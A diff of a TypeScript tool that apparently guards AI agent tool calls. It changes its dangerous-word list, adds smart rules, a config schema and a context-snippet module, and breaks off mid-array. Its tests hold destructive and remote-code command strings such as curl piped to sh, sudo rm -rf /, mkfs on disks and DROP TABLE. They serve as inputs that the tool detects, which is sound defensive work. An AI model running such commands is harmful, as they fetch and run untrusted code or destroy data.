expect(windowLines[lineIndex]).toContain('line_15'); + expect(windowLines[lineIndex].startsWith('🛑')).toBe(true); + }); + + it('clamps window to the start of the text (hit near the top)', () => { + const text = makeLines(20); + const { snippet } = extractContext(text, 'line_2'); + // Window starts at line_1 (no lines before line_2 to show 3 above) + expect(snippet).toContain('line_1'); + expect(snippet).not.toContain('... [0 lines hidden]'); + }); + + it('clamps window to the end of the text (hit near the bottom)', () => { + const text = makeLines(20); + const { snippet } = extractContext(text, 'line_20'); + expect(snippet).toContain('line_20'); + }); + + it('prefers a non-comment line over a comment line with the same word', () => { + const lines = [ + '// rm -rf is dangerous', // comment hit + 'const x = 1;', + 'const y = 2;', + 'const z = 3;', + 'const a = 4;', + 'const b = 5;', + 'const c = 6;', + 'const d = 7;', + 'exec("rm -rf /tmp/old")', // non-comment hit — should be preferred + ]; + const text = lines.join('\n'); + const { snippet } = extractContext(text, 'rm'); + // The 🛑 line should contain the exec call, not the comment + const markedLine = snippet.split('\n').find((l) => l.startsWith('🛑')); + expect(markedLine).toBeDefined(); + expect(markedLine).toContain('exec'); + }); + + it('falls back to first hit if all occurrences are in comments', () => { + const lines = [ + '// rm is bad', + '// rm should be avoided', + 'const x = 1;', + 'const y = 2;', + 'const z = 3;', + 'const a = 4;', + 'const b = 5;', + 'const c = 6;', + 'const d = 7;', + ]; + const text = lines.join('\n'); + const { snippet } = extractContext(text, 'rm'); + const markedLine = snippet.split('\n').find((l) => l.startsWith('🛑')); + expect(markedLine).toBeDefined(); + // Falls back to the first hit (line 0 — the comment) + expect(markedLine).toContain('rm is bad'); + }); + + it('returns full text when word is not found in any line', () => { + const text = makeLines(20); + const { lineIndex } = extractContext(text, 'nonexistent_xyz'); + expect(lineIndex).toBe(-1); + }); + + it('adds head/tail markers when window is in the middle of a long text', () => { + const text = makeLines(30); + // Hit is in the middle — there will be hidden lines above and below + const { snippet } = extractContext(text, 'line_15'); + expect(snippet).toContain('lines hidden'); + }); +}); + +// ── computeRiskMetadata ─────────────────────────────────────────────────────── + +describe('computeRiskMetadata', () => { + it('returns EXEC intent by default when no old_string/new_string', () => { + const meta = computeRiskMetadata({ command: 'sudo rm -rf /' }, 6, 'dangerous word: rm'); + expect(meta.intent).toBe('EXEC'); + }); + + it('returns EDIT intent when args has old_string and new_string', () => { + const meta = computeRiskMetadata( + { old_string: 'foo', new_string: 'bar', file_path: 'src/app.ts' }, + 5, + 'project rule' + ); + expect(meta.intent).toBe('EDIT'); + }); + + it('sets editFileName and editFilePath for EDIT intent', () => { + const meta = computeRiskMetadata( + { old_string: 'a', new_string: 'b', file_path: '/home/user/src/app.ts' }, + 5, + 'rule' + ); + expect(meta.editFilePath).toBe('/home/user/src/app.ts'); + expect(meta.editFileName).toBe('app.ts'); + }); + + it('includes tier and blockedByLabel in all cases', () => { + const meta = computeRiskMetadata({ command: 'drop' }, 6, 'dangerous: drop'); + expect(meta.tier).toBe(6); + expect(meta.blockedByLabel).toBe('dangerous: drop'); + }); + + it('includes matchedWord when provided', () => { + const meta = computeRiskMetadata({ command: 'mkfs /dev/sdb' }, 6, 'label', undefined, 'mkfs'); + expect(meta.matchedWord).toBe('mkfs'); + }); + + it('includes matchedField when provided', () => { + const meta = computeRiskMetadata({ command: 'x' }, 6, 'label', 'command'); + expect(meta.matchedField).toBe('command'); + }); + + it('includes ruleName when provided', () => { + const meta = computeRiskMetadata( + {}, + 2, + 'Smart Rule: block-force-push', + undefined, + undefined, + 'block-force-push' + ); + expect(meta.ruleName).toBe('block-force-push'); + }); + + it('extracts contextSnippet from matchedField for EXEC intent', () => { + const meta = computeRiskMetadata( + { command: 'sudo rm -rf /var' }, + 6, + 'label', + 'command', + 'sudo' + ); + expect(meta.contextSnippet).toBeDefined(); + expect(meta.contextSnippet).toContain('sudo'); + }); + + it('falls back to first code-like key when matchedField is absent', () => { + const meta = computeRiskMetadata({ command: 'ls -la' }, 6, 'label'); + // 'command' is in CODE_KEYS — should be picked up as the context source + expect(meta.contextSnippet).toBeDefined(); + expect(meta.contextSnippet).toContain('ls -la'); + }); + + it('handles Gemini-style stringified JSON args', () => { + const stringifiedArgs = JSON.stringify({ command: 'mkfs /dev/sdb' }); + const meta = computeRiskMetadata(stringifiedArgs, 6, 'label', 'command', 'mkfs'); + expect(meta.contextSnippet).toBeDefined(); + expect(meta.contextSnippet).toContain('mkfs'); + }); + + it('handles string args that are not JSON', () => { + const meta = computeRiskMetadata('plain string args', 6, 'label'); + expect(meta.contextSnippet).toBe('plain string args'); + }); + + it('omits optional fields when not provided', () => { + const meta = computeRiskMetadata({}, 3, 'inline exec'); + expect(meta.matchedWord).toBeUndefined(); + expect(meta.matchedField).toBeUndefined(); + expect(meta.ruleName).toBeUndefined(); + expect(meta.contextLineIndex).toBeUndefined(); + }); +}); diff --git a/src/__tests__/core.test.ts b/src/__tests__/core.test.ts index 36a4451..09443a7 100644 --- a/src/__tests__/core.test.ts +++ b/src/__tests__/core.test.ts @@ -135,8 +135,21 @@ describe('standard mode — safe tools', () => { }); // ── Standard mode — dangerous word detection ────────────────────────────────── +// DANGEROUS_WORDS is now intentionally minimal: only mkfs and shred. +// Everything else is handled by smart rules scoped to specific tool fields. describe('standard mode — dangerous word detection', () => { + it.each(['mkfs_ext4', 'run_mkfs', 'shred_file', 'shred_old_data'])( + 'evaluatePolicy flags "%s" as review (dangerous word match)', + async (tool) => { + expect((await evaluatePolicy(tool)).decision).toBe('review'); + } + ); + + it('dangerous word match is case-insensitive', async () => { + expect((await evaluatePolicy('MKFS_PARTITION')).decision).toBe('review'); + }); + it.each([ 'drop_table', 'truncate_logs', @@ -144,15 +157,12 @@ describe('standard mode — dangerous word detection', () => { 'format_drive', 'destroy_cluster', 'terminate_server', - 'revoke_access', 'docker_prune', - 'psql_execute', - ])('evaluatePolicy flags "%s" as review (dangerous word match)', async (tool) => { - expect((await evaluatePolicy(tool)).decision).toBe('review'); - }); - - it('dangerous word match is case-insensitive', async () => { - expect((await evaluatePolicy('DROP_DATABASE')).decision).toBe('review'); + ])('"%s" is now ALLOWED by default — was a false-positive source', async (tool) => { + // These words were removed from DANGEROUS_WORDS to prevent false positives + // (e.g. CSS drop-shadow, Vue destroy(), code formatters). + // Dangerous variants are now caught by scoped smart rules instead. + expect((await evaluatePolicy(tool)).decision).toBe('allow'); }); }); @@ -168,45 +178,116 @@ describe('persistent decision approval', () => { } it('returns true when persistent decision is allow', async () => { - // Using 'drop' because it triggers a review, thus checking the decision file - setPersistentDecision('drop_db', 'allow'); - expect(await authorizeAction('drop_db', {})).toBe(true); + // Using 'mkfs_db' because 'mkfs' is in DANGEROUS_WORDS — triggers review, then checks decision file + setPersistentDecision('mkfs_db', 'allow'); + expect(await authorizeAction('mkfs_db', {})).toBe(true); }); it('returns false when persistent decision is deny', async () => { - setPersistentDecision('drop_db', 'deny'); - expect(await authorizeAction('drop_db', {})).toBe(false); + setPersistentDecision('mkfs_db', 'deny'); + expect(await authorizeAction('mkfs_db', {})).toBe(false); }); }); // ── Bash tool — shell command interception ──────────────────────────────────── describe('Bash tool — shell command interception', () => { + // ── Smart rule: block-force-push ────────────────────────────────────────── + it.each([ + { cmd: 'git push --force', desc: '--force flag' }, + { cmd: 'git push --force-with-lease', desc: '--force-with-lease' }, + { cmd: 'git push origin main -f', desc: '-f shorthand' }, + ])('block-force-push: blocks "$desc"', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('block'); + expect(result.ruleName).toBe('block-force-push'); + }); + + // ── Smart rule: review-git-push ─────────────────────────────────────────── + it.each([ + { cmd: 'git push origin main', desc: 'regular push to branch' }, + { cmd: 'git push', desc: 'bare push' }, + { cmd: 'git push --tags', desc: 'push tags' }, + ])('review-git-push: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + expect(result.ruleName).toBe('review-git-push'); + }); + + // ── Smart rule: review-git-destructive ──────────────────────────────────── it.each([ - { cmd: 'psql -c "drop table"', desc: 'database drop' }, - { cmd: 'docker rm -f my_db', desc: 'docker removal' }, - { cmd: 'purge /var/log', desc: 'purge command' }, - { cmd: 'format /dev/sdb', desc: 'format command' }, - { cmd: 'truncate -s 0 /db.log', desc: 'truncate' }, - ])('blocks Bash when command is "$desc"', async ({ cmd }) => { - expect((await evaluatePolicy('Bash', { command: cmd })).decision).toBe('review'); + { cmd: 'git reset --hard HEAD', desc: 'reset --hard' }, + { cmd: 'git clean -fd', desc: 'clean -fd' }, + { cmd: 'git clean -fdx', desc: 'clean -fdx' }, + { cmd: 'git rebase main', desc: 'rebase' }, + { cmd: 'git branch -D old-feat', desc: 'branch -D' }, + { cmd: 'git tag -d v1.0', desc: 'tag delete' }, + ])('review-git-destructive: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + expect(result.ruleName).toBe('review-git-destructive'); + }); + + // ── Smart rule: review-sudo ─────────────────────────────────────────────── + it.each([ + { cmd: 'sudo apt install vim', desc: 'sudo apt install' }, + { cmd: 'sudo rm -rf /var', desc: 'sudo rm' }, + { cmd: 'sudo systemctl restart nginx', desc: 'sudo systemctl' }, + ])('review-sudo: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + expect(result.ruleName).toBe('review-sudo'); + }); + + // ── Smart rule: review-curl-pipe-shell ──────────────────────────────────── + it.each([ + { cmd: 'curl http://x.com | sh', desc: 'curl | sh' }, + { cmd: 'curl http://x.com | bash', desc: 'curl | bash' }, + { cmd: 'wget http://x.com | sh', desc: 'wget | sh' }, + ])('review-curl-pipe-shell: blocks "$desc"', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('block'); + expect(result.ruleName).toBe('review-curl-pipe-shell'); }); + // ── Smart rule: review-drop-truncate-shell ──────────────────────────────── + it.each([ + { cmd: 'psql -c "DROP TABLE users"', desc: 'psql DROP TABLE' }, + { cmd: 'mysql -e "TRUNCATE TABLE logs"', desc: 'mysql TRUNCATE TABLE' }, + { cmd: 'psql -c "drop database prod"', desc: 'psql drop database (lowercase)' }, + ])('review-drop-truncate-shell: flags "$desc" as review', async ({ cmd }) => { + const result = await evaluatePolicy('Bash', { command: cmd }); + expect(result.decision).toBe('review'); + }); + + // ── Commands that are now allowed (removed from DANGEROUS_WORDS) ────────── + it.each([ + { cmd: 'docker ps', desc: 'docker ps' }, + { cmd: 'docker rm my_container', desc: 'docker rm (not -f /)' }, + { cmd: 'purge /var/log', desc: 'purge' }, + { cmd: 'format string', desc: 'format (not disk)' }, + { cmd: 'truncate -s 0 /db.log', desc: 'truncate file (not SQL TABLE)' }, + ])('allows Bash when command is "$desc" (not dangerous by default)', async ({ cmd }) => { + expect((await evaluatePolicy('Bash', { command: cmd })).decision).toBe('allow'); + }); + + // ── Existing allow cases ────────────────────────────────────────────────── it.each([ { cmd: 'rm -rf node_modules', desc: 'rm on node_modules (allowed by rule)' }, { cmd: 'ls -la', desc: 'ls' }, { cmd: 'cat /etc/hosts', desc: 'cat' }, { cmd: 'npm install', desc: 'npm install' }, - { cmd: 'delete old_file.txt', desc: 'delete (low friction allow)' }, + { cmd: 'git log --oneline', desc: 'git log' }, + { cmd: 'git status', desc: 'git status' }, + { cmd: 'git diff HEAD', desc: 'git diff' }, ])('allows Bash when command is "$desc"', async ({ cmd }) => { expect((await evaluatePolicy('Bash', { command: cmd })).decision).toBe('allow'); }); - it('authorizeHeadless blocks Bash drop when no approval mechanism', async () => { + it('authorizeHeadless blocks force push when no approval mechanism', async () => { mockNoNativeConfig(); - const result = await authorizeHeadless('Bash', { command: 'drop database production' }); + const result = await authorizeHeadless('Bash', { command: 'git push --force' }); expect(result.approved).toBe(false); - expect(result.noApprovalMechanism).toBe(true); }); }); @@ -330,7 +411,7 @@ describe('authorizeHeadless', () => { it('returns approved:false with noApprovalMechanism when no API key', async () => { mockNoNativeConfig(); - const result = await authorizeHeadless('drop_db', {}); + const result = await authorizeHeadless('mkfs_db', {}); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); @@ -347,7 +428,7 @@ describe('authorizeHeadless', () => { json: async () => ({ approved: true, message: 'Approved via Slack' }), }) ); - const result = await authorizeHeadless('drop_db', { id: 1 }); + const result = await authorizeHeadless('mkfs_db', { id: 1 }); expect(result.approved).toBe(true); }); }); @@ -356,8 +437,8 @@ describe('authorizeHeadless', () => { describe('evaluatePolicy — project config', () => { it('returns "review" for dangerous tool', async () => { - // Changed 'delete_user' -> 'drop_user' to trigger the security review - expect((await evaluatePolicy('drop_user')).decision).toBe('review'); + // mkfs is in DANGEROUS_WORDS — tool names containing it are always reviewed + expect((await evaluatePolicy('mkfs_disk')).decision).toBe('review'); }); it('returns "allow" for safe tool in standard mode', async () => { @@ -380,47 +461,47 @@ describe('evaluatePolicy — project config', () => { describe('getPersistentDecision', () => { it('returns null when decisions file does not exist', () => { - expect(getPersistentDecision('drop_user')).toBeNull(); + expect(getPersistentDecision('mkfs_disk')).toBeNull(); }); it('returns "allow" when tool is set to always allow', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'allow' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'allow' }) : '' ); - expect(getPersistentDecision('drop_user')).toBe('allow'); + expect(getPersistentDecision('mkfs_disk')).toBe('allow'); }); it('returns "deny" when tool is set to always deny', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'deny' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'deny' }) : '' ); - expect(getPersistentDecision('drop_user')).toBe('deny'); + expect(getPersistentDecision('mkfs_disk')).toBe('deny'); }); it('returns null for an unrecognised value', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'maybe' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'maybe' }) : '' ); - expect(getPersistentDecision('drop_user')).toBeNull(); + expect(getPersistentDecision('mkfs_disk')).toBeNull(); }); }); describe('authorizeHeadless — persistent decisions', () => { + // Use 'mkfs_disk' — contains "mkfs" (still in DANGEROUS_WORDS) so it evaluates + // to "review" and authorizeHeadless will look up the persistent decision file. it('approves without API when persistent decision is "allow"', async () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'allow' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'allow' }) : '' ); - // Use 'drop_user' so authorizeHeadless flags it as dangerous first, - // then proceeds to check the persistent decision file. - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(true); }); @@ -428,9 +509,9 @@ describe('authorizeHeadless — persistent decisions', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'deny' }) : '' + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'deny' }) : '' ); - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); expect(result.reason).toMatch(/always deny/i); }); @@ -626,24 +707,26 @@ describe('evaluatePolicy — smart rules', () => { }); it('custom smart rule verdict:block returns block decision', async () => { + // Use a pattern not covered by DEFAULT_CONFIG rules so we can assert the + // custom rule's reason without it being shadowed by a default rule. mockProjectConfig({ policy: { smartRules: [ { - name: 'no-curl-pipe', + name: 'no-deploy-script', tool: 'bash', conditions: [ - { field: 'command', op: 'matches', value: 'curl.+\\|.*(bash|sh)', flags: 'i' }, + { field: 'command', op: 'matches', value: 'deploy_production\\.sh', flags: 'i' }, ], verdict: 'block', - reason: 'curl piped to shell', + reason: 'production deploy script blocked by policy', }, ], }, }); - const result = await evaluatePolicy('bash', { command: 'curl http://x.com | bash' }); + const result = await evaluatePolicy('bash', { command: './deploy_production.sh --env prod' }); expect(result.decision).toBe('block'); - expect(result.reason).toMatch(/curl piped to shell/); + expect(result.reason).toMatch(/production deploy script blocked by policy/); }); it('custom smart rule verdict:allow short-circuits all further checks', async () => { diff --git a/src/__tests__/gemini_integration.test.ts b/src/__tests__/gemini_integration.test.ts index 6d79d29..d93b011 100644 --- a/src/__tests__/gemini_integration.test.ts +++ b/src/__tests__/gemini_integration.test.ts @@ -63,31 +63,31 @@ beforeEach(() => { describe('Gemini Integration Security', () => { it('identifies "Shell" (capital S) as a shell-executing tool', async () => { mockConfig({}); - // Use 'drop' which is a true "Nuke" in our new DANGEROUS_WORDS - const result = await evaluatePolicy('Shell', { command: 'psql -c "drop table users"' }); + // mkfs is in DANGEROUS_WORDS — proves Shell is inspected as a shell tool + const result = await evaluatePolicy('Shell', { command: 'mkfs.ext4 /dev/sdb' }); expect(result.decision).toBe('review'); }); it('identifies "run_shell_command" as a shell-executing tool', async () => { mockConfig({}); - // Use 'purge' which is in our new DANGEROUS_WORDS - const result = await evaluatePolicy('run_shell_command', { command: 'purge /var/log' }); + // mkfs is in DANGEROUS_WORDS — catches filesystem-wiping commands + const result = await evaluatePolicy('run_shell_command', { command: 'mkfs.ext4 /dev/sdb' }); expect(result.decision).toBe('review'); }); it('correctly parses complex shell commands inside run_shell_command', async () => { mockConfig({}); - // Proves the AST parser finds dangerous words even at the end of a chain + // Proves the AST parser finds the dangerous token even at the end of a chain const result = await evaluatePolicy('run_shell_command', { - command: 'ls -la && drop database', + command: 'ls -la && mkfs /dev/sdb', }); expect(result.decision).toBe('review'); }); it('blocks dangerous commands in Gemini hooks without API key', async () => { mockConfig({}); - // 'docker' is in our new DANGEROUS_WORDS - const result = await authorizeHeadless('Shell', { command: 'docker rm -f my_container' }); + // mkfs triggers dangerous-word review; no native/cloud approver → noApprovalMechanism + const result = await authorizeHeadless('Shell', { command: 'mkfs /dev/sda' }); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); diff --git a/src/__tests__/protect.test.ts b/src/__tests__/protect.test.ts index e9d3f3b..5c9afc6 100644 --- a/src/__tests__/protect.test.ts +++ b/src/__tests__/protect.test.ts @@ -47,11 +47,12 @@ describe('protect()', () => { }); it('throws and does NOT call the wrapped function when denied', async () => { - // Changed 'delete_resource' -> 'drop_resource' - setPersistentDecision('drop_resource', 'deny'); + // 'mkfs_resource' contains 'mkfs' (in DANGEROUS_WORDS) so it evaluates to review, + // then the persistent deny decision kicks in. + setPersistentDecision('mkfs_resource', 'deny'); const fn = vi.fn(); - const secured = protect('drop_resource', fn); + const secured = protect('mkfs_resource', fn); await expect(secured()).rejects.toThrow(/denied/i); expect(fn).not.toHaveBeenCalled(); diff --git a/src/cli.ts b/src/cli.ts index 4d5948f..5cb3f32 100644 --- a/src/cli.ts +++ b/src/cli.ts @@ -333,7 +333,13 @@ program cloud: true, terminal: true, }; - approvers.cloud = !options.local; + // Only change cloud setting when --local is explicitly passed. + // Without --local, preserve whatever the user had before so that + // re-running `node9 login` to refresh an API key doesn't silently + // re-enable cloud approvals for users who had turned them off. + if (options.local) { + approvers.cloud = false; + } s.approvers = approvers; if (!fs.existsSync(path.dirname(configPath))) fs.mkdirSync(path.dirname(configPath), { recursive: true }); diff --git a/src/config-schema.ts b/src/config-schema.ts new file mode 100644 index 0000000..e2cef10 --- /dev/null +++ b/src/config-schema.ts @@ -0,0 +1,165 @@ +// src/config-schema.ts +// Zod schemas for node9 config.json validation. +// Validates each config layer before it is merged into the running config, +// so bad user configs produce a clear error instead of silently using defaults. + +import { z } from 'zod'; + +// ── Helpers ────────────────────────────────────────────────────────────────── + +/** Rejects strings that contain literal newline characters (breaks JSON). */ +const noNewlines = z.string().refine((s) => !s.includes('\n') && !s.includes('\r'), { + message: 'Value must not contain literal newline characters (use \\n instead)', +}); + +/** Validates that a string is a valid regex pattern. */ +const validRegex = noNewlines.refine( + (s) => { + try { + new RegExp(s); + return true; + } catch { + return false; + } + }, + { message: 'Value must be a valid regular expression' } +); + +// ── Smart Rules ─────────────────────────────────────────────────────────────── + +const SmartConditionSchema = z.object({ + field: z.string().min(1, 'Condition field must not be empty'), + op: z.enum(['matches', 'notMatches', 'contains', 'notContains', 'exists', 'notExists'], { + errorMap: () => ({ + message: 'op must be one of: matches, notMatches, contains, notContains, exists, notExists', + }), + }), + value: validRegex.optional(), + flags: z.string().optional(), +}); + +const SmartRuleSchema = z.object({ + name: z.string().optional(), + tool: z.string().min(1, 'Smart rule tool must not be empty'), + conditions: z.array(SmartConditionSchema).min(1, 'Smart rule must have at least one condition'), + conditionMode: z.enum(['all', 'any']).optional(), + verdict: z.enum(['allow', 'review', 'block'], { + errorMap: () => ({ message: 'verdict must be one of: allow, review, block' }), + }), + reason: z.string().optional(), +}); + +// ── Policy Rules ────────────────────────────────────────────────────────────── + +const PolicyRuleSchema = z.object({ + action: z.string().min(1), + allowPaths: z.array(z.string()).optional(), + blockPaths: z.array(z.string()).optional(), +}); + +// ── Top-level Config ───────────────────────────────────────────────────────── + +export const ConfigFileSchema = z + .object({ + version: z.string().optional(), + settings: z + .object({ + mode: z.enum(['standard', 'strict', 'audit']).optional(), + autoStartDaemon: z.boolean().optional(), + enableUndo: z.boolean().optional(), + enableHookLogDebug: z.boolean().optional(), + approvalTimeoutMs: z.number().nonnegative().optional(), + approvers: z + .object({ + native: z.boolean().optional(), + browser: z.boolean().optional(), + cloud: z.boolean().optional(), + terminal: z.boolean().optional(), + }) + .optional(), + environment: z.string().optional(), + slackEnabled: z.boolean().optional(), + enableTrustSessions: z.boolean().optional(), + allowGlobalPause: z.boolean().optional(), + }) + .optional(), + policy: z + .object({ + sandboxPaths: z.array(z.string()).optional(), + dangerousWords: z.array(noNewlines).optional(), + ignoredTools: z.array(z.string()).optional(), + toolInspection: z.record(z.string()).optional(), + rules: z.array(PolicyRuleSchema).optional(), + smartRules: z.array(SmartRuleSchema).optional(), + snapshot: z + .object({ + tools: z.array(z.string()).optional(), + onlyPaths: z.array(z.string()).optional(), + ignorePaths: z.array(z.string()).optional(), + }) + .optional(), + }) + .optional(), + environments: z.record(z.object({ requireApproval: z.boolean().optional() })).optional(), + }) + .strict({ message: 'Config contains unknown top-level keys' }); + +export type ConfigFileInput = z.input; + +/** + * Validates a parsed config object. Returns a formatted error string on failure, + * or null if valid. + */ +export function validateConfig(raw: unknown, filePath: string): string | null { + const result = ConfigFileSchema.safeParse(raw); + if (result.success) return null; + + const lines = result.error.issues.map((issue) => { + const path = issue.path.length > 0 ? issue.path.join('.') : 'root'; + return ` • ${path}: ${issue.message}`; + }); + + return `Invalid config at ${filePath}:\n${lines.join('\n')}`; +} + +/** + * Like validateConfig, but also returns a sanitized copy of the config with + * invalid fields removed. Top-level fields that fail validation are dropped so + * they cannot override valid values from a higher-priority config layer. + */ +export function sanitizeConfig(raw: unknown): { + sanitized: Record; + error: string | null; +} { + const result = ConfigFileSchema.safeParse(raw); + if (result.success) { + return { sanitized: result.data as Record, error: null }; + } + + // Build the set of top-level keys that have at least one validation error + const invalidTopLevelKeys = new Set( + result.error.issues + .filter((issue) => issue.path.length > 0) + .map((issue) => String(issue.path[0])) + ); + + // Keep only the top-level keys that had no errors + const sanitized: Record = {}; + if (typeof raw === 'object' && raw !== null) { + for (const [key, value] of Object.entries(raw as Record)) { + if (!invalidTopLevelKeys.has(key)) { + sanitized[key] = value; + } + } + } + + const lines = result.error.issues.map((issue) => { + const path = issue.path.length > 0 ? issue.path.join('.') : 'root'; + return ` • ${path}: ${issue.message}`; + }); + + return { + sanitized, + error: `Invalid config:\n${lines.join('\n')}`, + }; +} diff --git a/src/context-sniper.ts b/src/context-sniper.ts new file mode 100644 index 0000000..bb2a1c0 --- /dev/null +++ b/src/context-sniper.ts @@ -0,0 +1,161 @@ +// src/context-sniper.ts +// Shared Context Sniper module. +// Pre-computes the code snippet and intent ONCE in authorizeHeadless (core.ts), +// then the resulting RiskMetadata bundle flows to every approval channel: +// native popup, browser daemon, cloud/SaaS backend, Slack, and Mission Control. + +import path from 'path'; + +export interface RiskMetadata { + intent: 'EDIT' | 'EXEC'; + tier: 1 | 2 | 3 | 4 | 5 | 6 | 7; + blockedByLabel: string; + matchedWord?: string; + matchedField?: string; + contextSnippet?: string; // Pre-computed 7-line window with 🛑 marker + contextLineIndex?: number; // Index of the 🛑 line within the snippet (0-based) + editFileName?: string; // basename of file_path (EDIT intent only) + editFilePath?: string; // full file_path (EDIT intent only) + ruleName?: string; // Tier 2 (Smart Rules) only +} + +/** Keeps the start and end of a long string, truncating the middle. */ +export function smartTruncate(str: string, maxLen = 500): string { + if (str.length <= maxLen) return str; + const edge = Math.floor(maxLen / 2) - 3; + return `${str.slice(0, edge)} ... ${str.slice(-edge)}`; +} + +/** + * Returns the 7-line context window centred on matchedWord, plus the + * 0-based index of the hit line within the returned snippet. + * If the text is short or the word isn't found, returns the full text and lineIndex -1. + */ +export function extractContext( + text: string, + matchedWord?: string +): { snippet: string; lineIndex: number } { + const lines = text.split('\n'); + if (lines.length <= 7 || !matchedWord) { + return { snippet: smartTruncate(text, 500), lineIndex: -1 }; + } + + const escaped = matchedWord.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); + const pattern = new RegExp(`\\b${escaped}\\b`, 'i'); + + const allHits = lines.map((line, i) => ({ i, line })).filter(({ line }) => pattern.test(line)); + if (allHits.length === 0) return { snippet: smartTruncate(text, 500), lineIndex: -1 }; + + // Prefer non-comment lines so we highlight actual code, not documentation + const nonComment = allHits.find(({ line }) => { + const trimmed = line.trim(); + return !trimmed.startsWith('//') && !trimmed.startsWith('#'); + }); + const hitIndex = (nonComment ?? allHits[0]).i; + + const start = Math.max(0, hitIndex - 3); + const end = Math.min(lines.length, hitIndex + 4); + const lineIndex = hitIndex - start; + + const snippet = lines + .slice(start, end) + .map((line, i) => `${start + i === hitIndex ? '🛑 ' : ' '}${line}`) + .join('\n'); + + const head = start > 0 ? `... [${start} lines hidden] ...\n` : ''; + const tail = end < lines.length ? `\n... [${lines.length - end} lines hidden] ...` : ''; + + return { snippet: `${head}${snippet}${tail}`, lineIndex }; +} + +const CODE_KEYS = [ + 'command', + 'cmd', + 'shell_command', + 'bash_command', + 'script', + 'code', + 'input', + 'sql', + 'query', + 'arguments', + 'args', + 'param', + 'params', + 'text', +]; + +/** + * Computes the RiskMetadata bundle from args + policy result fields. + * Called once in authorizeHeadless; the result is forwarded unchanged to all channels. + */ +export function computeRiskMetadata( + args: unknown, + tier: RiskMetadata['tier'], + blockedByLabel: string, + matchedField?: string, + matchedWord?: string, + ruleName?: string +): RiskMetadata { + let intent: 'EDIT' | 'EXEC' = 'EXEC'; + let contextSnippet: string | undefined; + let contextLineIndex: number | undefined; + let editFileName: string | undefined; + let editFilePath: string | undefined; + + // Handle Gemini-style stringified JSON + let parsed = args; + if (typeof args === 'string') { + const trimmed = args.trim(); + if (trimmed.startsWith('{') && trimmed.endsWith('}')) { + try { + parsed = JSON.parse(trimmed); + } catch { + /* keep as string */ + } + } + } + + if (parsed && typeof parsed === 'object' && !Array.isArray(parsed)) { + const obj = parsed as Record; + + if (obj.old_string !== undefined && obj.new_string !== undefined) { + // EDIT intent — extract context from the incoming new_string + intent = 'EDIT'; + if (obj.file_path) { + editFilePath = String(obj.file_path); + editFileName = path.basename(editFilePath); + } + const result = extractContext(String(obj.new_string), matchedWord); + contextSnippet = result.snippet; + if (result.lineIndex >= 0) contextLineIndex = result.lineIndex; + } else if (matchedField && obj[matchedField] !== undefined) { + // EXEC — we know which field triggered, extract context from it + const result = extractContext(String(obj[matchedField]), matchedWord); + contextSnippet = result.snippet; + if (result.lineIndex >= 0) contextLineIndex = result.lineIndex; + } else { + // EXEC fallback — pick the first recognisable code-like key + const foundKey = Object.keys(obj).find((k) => CODE_KEYS.includes(k.toLowerCase())); + if (foundKey) { + const val = obj[foundKey]; + contextSnippet = smartTruncate(typeof val === 'string' ? val : JSON.stringify(val), 500); + } + } + } else if (typeof parsed === 'string') { + contextSnippet = smartTruncate(parsed, 500); + } + + return { + intent, + tier, + blockedByLabel, + ...(matchedWord && { matchedWord }), + ...(matchedField && { matchedField }), + ...(contextSnippet !== undefined && { contextSnippet }), + ...(contextLineIndex !== undefined && { contextLineIndex }), + ...(editFileName && { editFileName }), + ...(editFilePath && { editFilePath }), + ...(ruleName && { ruleName }), + }; +} diff --git a/src/core.ts b/src/core.ts index 89dff7e..517ad77 100644 --- a/src/core.ts +++ b/src/core.ts @@ -7,6 +7,8 @@ import os from 'os'; import pm from 'picomatch'; import { parse } from 'sh-syntax'; import { askNativePopup, sendDesktopNotification } from './ui/native'; +import { computeRiskMetadata, RiskMetadata } from './context-sniper'; +import { sanitizeConfig } from './config-schema'; // ── Feature file paths ──────────────────────────────────────────────────────── const PAUSED_FILE = path.join(os.homedir(), '.node9', 'PAUSED'); @@ -460,16 +462,12 @@ export const DANGEROUS_WORDS = [ 'format', ]; */ +// Intentionally minimal — only words that are catastrophic AND never appear +// in legitimate code/content. Everything else is handled by smart rules, +// which can scope to specific tool fields and avoid false positives. export const DANGEROUS_WORDS = [ - 